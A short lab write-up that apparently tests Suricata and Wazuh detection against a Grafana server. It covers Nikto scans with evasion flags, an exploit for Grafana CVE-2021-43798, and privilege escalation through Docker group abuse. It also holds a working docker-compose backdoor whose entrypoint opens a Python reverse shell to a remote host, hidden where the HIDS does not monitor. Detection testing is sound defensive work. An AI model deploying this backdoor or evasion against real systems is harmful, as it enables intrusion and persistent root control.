Server uses Grafana internally (Port 3000), and uses Suricata for NIDS and Wazuh for HIDS
Testing for alerts with Nmap & Nikto
NMAP
Using NULL and STEALTH scans, User-agent spoofing and decoy IPs
NIKTO
By default nikto scans for every possible vulnerability. Can be tweaked by using -T n (We used nikto -T 1 2 3 for directory discovery only):
# Type of scan (T for "tuning") and user agent specified:
nikto -T 1 2 3 4 -h <IP || host> -p 80 -useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
# Evasion & Encoding with -evasion+
nikto -e 1 7 *Grafana 8.2.5 Vulnerability (CVE-2021-43798)
Exploitation:
Using https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798 exploit:
Alert in Suricata
Privilege Escalation
DOCKER ABUSE
As the current user is part of the Docker group, we can run an interactive container and mounting the root FS from the host to the container, effectively changing the sudoers file and adding our user to obtain sudo privileges.
Since our HIDS is monitoring the most common files and folders, there’s one it’s not monitoring ((var/lib), in which all Docker files are stored. We just created a docker-compose.yml with an entrypoint creating a rev shell:
---
version: "2.1"
services:
backdoorservice:
restart: always
image: # Existing container image on the system (Name, not tag)
entrypoint: >
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("<remote_IP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")'
volumes:
- /:/mnt
privileged: trueAnd running docker-compose up to catch the connection
Wazuh not working
